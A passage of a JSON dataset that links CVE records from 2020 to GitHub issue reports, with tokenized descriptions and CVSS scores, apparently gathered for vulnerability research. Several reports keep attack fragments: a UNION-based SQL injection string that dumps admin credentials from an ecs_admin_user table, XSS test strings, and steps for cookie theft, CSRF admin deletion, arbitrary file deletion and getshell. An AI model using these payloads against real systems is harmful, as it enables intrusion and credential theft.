        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-1738",
        "Issue_Url_old": "https://github.com/ansible/ansible/issues/67796",
        "Issue_Url_new": "https://github.com/ansible/ansible/issues/67796",
        "Repo_new": "ansible/ansible",
        "Issue_Created_At": "2020-02-26T19:57:02Z",
        "description": "package and service modules allow arbitrary modules to be executed . SUMMARY CVETAG Both package and service modules use facts to determine the name of the module to run if use is not passed to the module. The APITAG and APITAG facts could be set to another module name or a module name installed in a collection such as APITAG , which would allow arbitrary code execution on the managed node. A potential fix would be to whitelist valid modules for package and service and/or have the collection loader validate the collection path to not allow arbitrary files. The collection loader part may already be fixed in NUMBERTAG ISSUE TYPE Bug Report COMPONENT NAME APITAG APITAG ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml EXPECTED RESULTS ACTUAL RESULTS paste below",
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:L",
        "severity": "LOW",
        "baseScore": 3.9,
        "impactScore": 2.7,
        "exploitabilityScore": 0.8
    },
    {
        "CVE_ID": "CVE-2020-1739",
        "Issue_Url_old": "https://github.com/ansible/ansible/issues/67797",
        "Issue_Url_new": "https://github.com/ansible/ansible/issues/67797",
        "Repo_new": "ansible/ansible",
        "Issue_Created_At": "2020-02-26T19:58:52Z",
        "description": "Command used in subversion module is problematic. SUMMARY CVETAG The password is used in the svn command that is run by the subversion module. The password should be passed in via some other mechanism other than as a parameter to avoid the password being read at APITAG on the managed node. Problematic code: URLTAG ISSUE TYPE Bug Report COMPONENT NAME APITAG ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml subversion: repo: PATHTAG dest: /src/checkout checkout: no update: no password: \"{{ vault_svn_pass }}\" EXPECTED RESULTS Password is not visible. ACTUAL RESULTS Password can be observed at APITAG on the managed node.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N",
        "severity": "LOW",
        "baseScore": 3.9,
        "impactScore": 2.5,
        "exploitabilityScore": 1.3
    },
    {
        "CVE_ID": "CVE-2020-1740",
        "Issue_Url_old": "https://github.com/ansible/ansible/issues/67798",
        "Issue_Url_new": "https://github.com/ansible/ansible/issues/67798",
        "Repo_new": "ansible/ansible",
        "Issue_Created_At": "2020-02-26T20:00:23Z",
        "description": "ansible vault edit race condition. SUMMARY CVETAG A race condition exists in APITAG which could allow another user on the same computer can read the old and new secret. When executing APITAG , the method APITAG creates the temporary file with APITAG . However, the returned file descriptor is closed and APITAG is called to write to the file. APITAG will delete the file and recreate it. A malicious user can create the file with permissions allowing them access to the file after the unlink. The proposed solution is to write directly to the file descriptor in APITAG rather than deleting and creating a new file. Relevant code: URLTAG ISSUE TYPE Bug Report COMPONENT NAME APITAG ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml EXPECTED RESULTS ACTUAL RESULTS paste below",
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.7,
        "impactScore": 3.6,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2020-17479",
        "Issue_Url_old": "https://github.com/manvel-khnkoyan/jpv/issues/10",
        "Issue_Url_new": "https://github.com/manvel-khnkoyan/jpv/issues/10",
        "Repo_new": "manvel-khnkoyan/jpv",
        "Issue_Created_At": "2020-08-06T20:07:51Z",
        "description": "Validation Bypass. Hello, I'm a security researcher at Sonatype, and I discovered a potential vulnerability in this project. Do you have a preferred way for me to share the details privately, or do you want me to just show you what I've got on this APITAG issue?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-17487",
        "Issue_Url_old": "https://github.com/radareorg/radare2/issues/17431",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/17431",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2020-08-09T11:24:28Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-17495",
        "Issue_Url_old": "https://github.com/celery/django-celery-results/issues/142",
        "Issue_Url_new": "https://github.com/celery/django-celery-results/issues/142",
        "Repo_new": "celery/django-celery-results",
        "Issue_Created_At": "2020-04-13T19:27:43Z",
        "description": "Question: Disable storing of task arguments. Hi, apologies if this is documented somewhere (I can't find it), but is there a quick way not to store the arguments that were passed to the celery task? Some of my tasks contain potentially sensitive information, and I would prefer not to have a permanent record of them inside of my database (I'm also looking at encrypting this information, but would prefer not to store it regardless).",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-17541",
        "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/392",
        "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/392",
        "Repo_new": "libjpeg-turbo/libjpeg-turbo",
        "Issue_Created_At": "2019-12-05T13:46:42Z",
        "description": "report a stack buffer overflow security issue. There' s a stack buffer overflow in encode_one_block function, the backtrace of the crash point is below. The version is the latest from the git main branch: APITAG ERRORTAG poc URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-17542",
        "Issue_Url_old": "https://github.com/dotCMS/core/issues/16890",
        "Issue_Url_new": "https://github.com/dotcms/core/issues/16890",
        "Repo_new": "dotcms/core",
        "Issue_Created_At": "2019-07-19T03:44:10Z",
        "description": "APITAG NUMBERTAG stored xss vul.. hi, I've found a xss vul on APITAG NUMBERTAG it allows remote attackers to insert js code and print APITAG screenshots below. FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-17551",
        "Issue_Url_old": "https://github.com/ImpressCMS/impresscms/issues/659",
        "Issue_Url_new": "https://github.com/impresscms/impresscms/issues/659",
        "Repo_new": "impresscms/impresscms",
        "Issue_Created_At": "2020-06-18T23:49:04Z",
        "description": "Stored XSS on APITAG NUMBERTAG Payload = APITAG APITAG Vulnerable URL PATHTAG Vulnerable APITAG : ID of the [adsense tag to display this ad] Vulnerable URL PATHTAG Vulnerable APITAG : Name Reference URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-18035",
        "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/8",
        "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/8",
        "Repo_new": "zchuanzhao/jeesns",
        "Issue_Created_At": "2018-12-24T07:48:19Z",
        "description": "\u53cd\u5c04\u578bxss. \u60a8\u597d\uff1a APITAG APITAG FILETAG \u867d\u7136\u9879\u76ee\u4e2d\u5b58\u5728xss\u62e6\u622a\u5668 FILETAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18065",
        "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/16",
        "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/16",
        "Repo_new": "popojicms/popojicms",
        "Issue_Created_At": "2019-01-06T15:52:51Z",
        "description": "The APITAG NUMBERTAG has xss in URLTAG NUMBERTAG login NUMBERTAG open URLTAG NUMBERTAG edit menu FILETAG NUMBERTAG open and input exp \"> APITAG alert(\"xss\") APITAG FILETAG APITAG the id parameter",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-18066",
        "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/42",
        "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/42",
        "Repo_new": "94fzb/zrlog",
        "Issue_Created_At": "2019-01-08T09:46:27Z",
        "description": "There is a stored XSS in the frontend which hacker can escalate of Privileges. APITAG is a stored XSS in ther front end which hack can escalate of Privileges. when we access url below: APITAG FILETAG we can see there contains a comment modul\uff0cit does't check the user input,so when we submit the comment form with the palyoad below,this stored xss will be happened. payload :\u201c> APITAG Requested data packet : ERRORTAG when the cross site script successful executed,we can see the cookie of the frontend viewr's was been stolen. FILETAG And more seriously,when the admin log in the backend and access the comment manage module,it will cause the cross site script excute which submit by APITAG after that,the cookie of the admin will be stolen,and the hacker will use the cookie to escalate of Privileges. FILETAG suggestions: APITAG the parameter in the comment form below: APITAG APITAG a global interceptor to filtered the parameter input from APITAG use the entity encode to encode the parameter,to avoid the use of label such as '<' or '>'. Hope you guy fix this flaw quickly,if you have some request,please contact me with the email below: EMAILTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18070",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/46",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/46",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2019-01-08T16:00:58Z",
        "description": "A vulnerability that can delete any folder in the server. The APITAG method in APITAG does not filter the input content ,it can be used to delete any folder in the server. FILETAG FILETAG And there's also a small problem. When deleting the backup file, only the backup folder is deleted, and the zip file is not deleted. The database file can be downloaded directly (It's hard to get the APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18084",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/9",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/9",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2019-01-25T15:40:33Z",
        "description": "There is a XSS vulnerability discovered in yzmcms NUMBERTAG ss payload: \"> APITAG alert NUMBERTAG APITAG <\" POC: CODETAG Execute payload when login is successful FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18102",
        "Issue_Url_old": "https://github.com/FantasticLBP/Hotels_Server/issues/3",
        "Issue_Url_new": "https://github.com/fantasticlbp/hotels_server/issues/3",
        "Repo_new": "fantasticlbp/hotels_server",
        "Issue_Created_At": "2019-01-23T16:31:32Z",
        "description": "XSS Vulnerability in FILETAG . In FILETAG FILETAG As you see, there are not any filtration in all \u2018echo\u2019s. Also in FILETAG , these are inserted into database without filtration FILETAG After all, we can enjoy XSS FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18106",
        "Issue_Url_old": "https://github.com/FeMiner/wms/issues/7",
        "Issue_Url_new": "https://github.com/feminer/wms/issues/7",
        "Repo_new": "feminer/wms",
        "Issue_Created_At": "2019-03-13T11:23:13Z",
        "description": "SQL injection in FILETAG SQL injection in FILETAG APITAG The GET parameter \"id\" is passed without filtering to SQL sentence which causes the vulnerability.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18121",
        "Issue_Url_old": "https://github.com/Indexhibit/indexhibit/issues/17",
        "Issue_Url_new": "https://github.com/indexhibit/indexhibit/issues/17",
        "Repo_new": "indexhibit/indexhibit",
        "Issue_Created_At": "2019-02-14T04:27:30Z",
        "description": "There is a improper configuration leads to getshell. There is a improper configuration leads to getshell. poc: first,let's sign in our indexhibit CMS,then we can see this choice APITAG FILETAG so,we can modify the plugins,include php APITAG modify: FILETAG we can use knife to connect: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18123",
        "Issue_Url_old": "https://github.com/Indexhibit/indexhibit/issues/18",
        "Issue_Url_new": "https://github.com/indexhibit/indexhibit/issues/18",
        "Repo_new": "indexhibit/indexhibit",
        "Issue_Created_At": "2019-02-16T14:04:55Z",
        "description": "There is a CSRF vulnerability that can be deleted administrator account . Here is a CSRF attacks. poc: first,as we all know,when we install the website,the id of installer(inde NUMBERTAG is NUMBERTAG always means admin),so the id of inde NUMBERTAG is NUMBERTAG FILETAG ok,make id NUMBERTAG FILETAG let's refresh,we can see we have deleted the account of inde NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18124",
        "Issue_Url_old": "https://github.com/Indexhibit/indexhibit/issues/19",
        "Issue_Url_new": "https://github.com/indexhibit/indexhibit/issues/19",
        "Repo_new": "indexhibit/indexhibit",
        "Issue_Created_At": "2019-02-16T14:22:07Z",
        "description": "There is a CSRF vulnerability that can be reset password of any account. There is a CSRF vulnerability to reset password first,let's use this account: username=test and id NUMBERTAG In fact,we all know the id NUMBERTAG and username=inde NUMBERTAG is installer,but I have deleted.) FILETAG ok,poc: FILETAG ok,we reset the password of test and log in: FILETAG note:the exp we can get password by grab the return packet.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.7,
        "impactScore": 3.6,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2020-18125",
        "Issue_Url_old": "https://github.com/Indexhibit/indexhibit/issues/20",
        "Issue_Url_new": "https://github.com/indexhibit/indexhibit/issues/20",
        "Repo_new": "indexhibit/indexhibit",
        "Issue_Created_At": "2019-02-17T12:24:16Z",
        "description": "Reflected Cross Site Scripting(XSS) PATHTAG In page PATHTAG the POST function can change the function used in PHP, the user/attacker can modify the parament and add the script which will be shown without filtering. They can use the script to steal the cookie or some things worse. Payload used: jxs=slideshow&i NUMBERTAG z= ERRORTAG Affected URL: FILETAG so,when we visit this PATHTAG and POST data: jxs=slideshow&i NUMBERTAG z= ERRORTAG The js will executes. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18126",
        "Issue_Url_old": "https://github.com/Indexhibit/indexhibit/issues/21",
        "Issue_Url_new": "https://github.com/indexhibit/indexhibit/issues/21",
        "Repo_new": "indexhibit/indexhibit",
        "Issue_Created_At": "2019-02-19T21:44:56Z",
        "description": "There are multiple cross site scripting (XSS) vulnerabilities in the management panel . There are two Stored XSS Vulnerabilities in the backstage We can make the Stored XSS via edit the Projects or Main poc: FILETAG FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-18127",
        "Issue_Url_old": "https://github.com/Indexhibit/indexhibit/issues/22",
        "Issue_Url_new": "https://github.com/indexhibit/indexhibit/issues/22",
        "Repo_new": "indexhibit/indexhibit",
        "Issue_Created_At": "2019-02-19T21:57:33Z",
        "description": "There is a insecure permission so that we can read any file we want,include FILETAG . When we log in,we can view some css APITAG there is a insecure permission so that we can view any file. poc: URLTAG APITAG FILETAG APITAG parameter we put need Rigorous testing",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18144",
        "Issue_Url_old": "https://github.com/yundiao/ectouch/issues/1",
        "Issue_Url_new": "https://github.com/yundiao/ectouch/issues/1",
        "Repo_new": "yundiao/ectouch",
        "Issue_Created_At": "2019-02-12T17:33:14Z",
        "description": "Ectouch CMS Front end SQL Injection Vulnerability. I. Vulnerability Source Code Analysis NUMBERTAG Payload FILETAG APITAG Code payload with a URL (notice that there is a space before union): union select APITAG from ecs_admin_user order by goods_id asc In the latest version, payload will not be able to bring in SQL code without URL encoding. APITAG versions don't require URL encoding to be brought into payload execution; new versions only cause program execution errors, but can't bring in palyad NUMBERTAG ulnerability access file As can be seen from the URL request, the vulnerability entry file is: PATHTAG asynclist_list function. FILETAG $this APITAG fetch the parameter of integral_min from the URL REQUEST. APITAG bring the parameter in SQL operation NUMBERTAG APITAG function FILETAG APITAG function is located in PATHTAG controller. Using I function to get the parameters of integral_min. I function is located in PATHTAG The input parameters are obtained and filtered. FILETAG In function I, use DEFAULT_FILTER for filtering. It located in PATHTAG , and the value is htmlspecialchars. FILETAG Converted to single and double quotation marks, But payload does not need single or double quotes NUMBERTAG APITAG function Located in PATHTAG model. FILETAG There are no single or double quotation marks in the whole process. FILETAG II. Vulnerability Exploitation NUMBERTAG Special description: When accessed by a computer side browser, because of the file \u201c.htaccess\u201d at the root directory, will be denied access. Even just visiting the home page won't do. Because the file just redirects to APITAG No impact on testing and utilization. The name \".htaccess\" must be deleted or modified before it can be accessed in a computer browser. It does not affect the use of burpsuite to intercept mobile access APITAG access does not require modifying the file name). This test is after modifying the \".htaccess\" file name, tested on computer NUMBERTAG testing environment Windows + firefox + apache2 + APITAG environment\uff09 APITAG NUMBERTAG Payload FILETAG A\u3001 The end of the request must keep up with two \u201c \u201d\uff08two lines \uff09;otherwise, there is no response to the request. B\u3001 union select APITAG from ecs_admin_user order by goods_id asc APITAG is a space before nuion\uff09encode with url. C\u3001 Request url: GET APITAG HTTP NUMBERTAG FILETAG APITAG return \u201cadmin\u201d and APITAG After decode with MD5 is \u201cadmin\u201d. Get the administrator's account and password.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18145",
        "Issue_Url_old": "https://github.com/fex-team/umeditor/issues/624",
        "Issue_Url_new": "https://github.com/fex-team/umeditor/issues/624",
        "Repo_new": "fex-team/umeditor",
        "Issue_Created_At": "2019-03-04T17:17:01Z",
        "description": "I found a reflective XSS vulnerability in FILETAG . Testing environment: localhost Windows + firefox + APITAG + apache2 + APITAG I. Vulnerability analysis FILETAG FILETAG II. Exploit FILETAG url: FILETAG payload: APITAG APITAG // \"E\" in the word APITAG must be capitalized.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18151",
        "Issue_Url_old": "https://github.com/thinkcmf/thinkcmf/issues/580",
        "Issue_Url_new": "https://github.com/thinkcmf/thinkcmf/issues/580",
        "Repo_new": "thinkcmf/thinkcmf",
        "Issue_Created_At": "2019-03-25T10:35:44Z",
        "description": "I found a CSRF vulnerability to add an administrator. When an administrator clicks on a web page that contains the following content, a new administrator is added. APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18155",
        "Issue_Url_old": "https://github.com/intelliants/subrion/issues/817",
        "Issue_Url_new": "https://github.com/intelliants/subrion/issues/817",
        "Repo_new": "intelliants/subrion",
        "Issue_Created_At": "2019-04-03T10:24:41Z",
        "description": "There is a time based sql injection if use PDO. I. Vulnerability Analysis Subrion CMS supports three ways of connecting mysql: mysql, mysqli and PDO. The default is mysqli. They are executed by three files in the PATHTAG directory. FILETAG FILETAG FILETAG If a website uses PDO connection, there will be a vulnerability. II. Vulnerability testing Using PDO connections requires modifying the file /includes/config. inc. php. Change mysqli to pdo. FILETAG In the search page: URLTAG POC and testing: APITAG FILETAG APITAG FILETAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18175",
        "Issue_Url_old": "https://github.com/sword1991912/metinfo/issues/1",
        "Issue_Url_new": "https://github.com/291237388/metinfo/issues/1",
        "Repo_new": "291237388/metinfo",
        "Issue_Created_At": "2019-02-13T02:09:52Z",
        "description": "There is a SQL inject vulnerability(limited by PHP ts). Analysis Look at APITAG there is a function called APITAG ERRORTAG we can APITAG to directly into the SQL statement For convenience of debugging\uff1a FILETAG FILETAG After that. visit the url\uff1a URLTAG FILETAG as u can see\uff0c APITAG has been inserted into SQL statement Then: URLTAG FILETAG Exploit key is the only restriction (from APITAG Called by auth class) If PHP ts: APITAG FILETAG elif PHP nts: FILETAG sqlmap tamper ERRORTAG Encode script( APITAG in sqlmap tamper): ERRORTAG Then run command CODETAG FILETAG APITAG register a member with user name \"tete\" by yourself or modify the script)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18178",
        "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/11",
        "Issue_Url_new": "https://github.com/neeke/hongcms/issues/11",
        "Repo_new": "neeke/hongcms",
        "Issue_Created_At": "2019-02-12T05:35:19Z",
        "description": "arbitrary file rewrite and read in Hongcms NUMBERTAG there is an arbitrary file read and rewrite in the backend of this cms via the link: PATHTAG when post params : APITAG FILETAG APITAG in the latest NUMBERTAG edtion, the cms try to use ajax to escape attacker to do same dangerous action like change file name etc but it can also be catched by proxy it will write your payload into any file which is writeable we create new file test.php to check this vuln: FILETAG we can access to it via link as URLTAG file name",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18184",
        "Issue_Url_old": "https://github.com/pluxml/PluXml/issues/320",
        "Issue_Url_new": "https://github.com/pluxml/pluxml/issues/320",
        "Repo_new": "pluxml/pluxml",
        "Issue_Created_At": "2019-02-17T15:41:37Z",
        "description": "An issue in the theme edit function. The theme edit function PATHTAG allows remote attackers to execute arbitrary PHP code by placing this code into a template. Poc: CODETAG FILETAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-18185",
        "Issue_Url_old": "https://github.com/pluxml/PluXml/issues/321",
        "Issue_Url_new": "https://github.com/pluxml/pluxml/issues/321",
        "Repo_new": "pluxml/pluxml",
        "Issue_Created_At": "2019-02-18T06:12:50Z",
        "description": "An issue when the application run in a linux environment. FILETAG in APITAG allows attackers to execute arbitrary PHP code by modify the configuration file in a linux environment. Source PATHTAG line NUMBERTAG ERRORTAG Poc: CODETAG then visit FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18190",
        "Issue_Url_old": "https://github.com/bludit/bludit/issues/978",
        "Issue_Url_new": "https://github.com/bludit/bludit/issues/978",
        "Repo_new": "bludit/bludit",
        "Issue_Created_At": "2019-03-05T02:50:16Z",
        "description": "Arbitrary File Delete Security. Hi There. I found Bludit NUMBERTAG allows remote attackers to delete arbitrary files via PATHTAG payload: ERRORTAG then the file PATHTAG will be deleted.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18191",
        "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1303",
        "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1303",
        "Repo_new": "getsimplecms/getsimplecms",
        "Issue_Created_At": "2019-03-05T08:11:53Z",
        "description": "Arbitrary File Delete Security. Hi There. I found APITAG NUMBERTAG allows remote attackers to delete arbitrary files via PATHTAG payload: CODETAG then the file FILETAG will be deleted.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18220",
        "Issue_Url_old": "https://github.com/doramart/DoraCMS/issues/190",
        "Issue_Url_new": "https://github.com/doramart/doracms/issues/190",
        "Repo_new": "doramart/doracms",
        "Issue_Created_At": "2019-02-19T18:17:06Z",
        "description": "Hardcoded key vulnerability usage of static salt . Application uses static key when performing encryption which makes it easier for an attacker to conduct brute force password guessing. Affected URL: FILETAG const APITAG = \"doracms_\"; const MD5key = \"dora\"; export default { AES: { encrypt: (message) => {//\u52a0\u5bc6 return APITAG APITAG { mode: APITAG padding: APITAG APITAG }, Affected URL: FILETAG if APITAG { APITAG = APITAG APITAG } Solution: APITAG = function(message, password) { var salt = APITAG var key = APITAG salt NUMBERTAG ar iv = APITAG var cipher = APITAG CBC', key); APITAG iv}); APITAG APITAG var APITAG = APITAG return {cipher_text: APITAG salt: APITAG iv: APITAG } Source: URLTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18221",
        "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2204",
        "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2204",
        "Repo_new": "typora/typora-issues",
        "Issue_Created_At": "2019-02-20T02:08:33Z",
        "description": "APITAG XSS to RCE. Tested On Windows NUMBERTAG APITAG FILETAG XSS: ERRORTAG FILETAG FILETAG RCE: ERRORTAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18229",
        "Issue_Url_old": "https://github.com/PearlyNautilus/Security-Code-Review/issues/4",
        "Issue_Url_new": "https://github.com/pearlynautilus/security-code-review/issues/4",
        "Repo_new": "PearlyNautilus/Security-Code-Review",
        "Issue_Created_At": "2019-03-08T07:49:52Z",
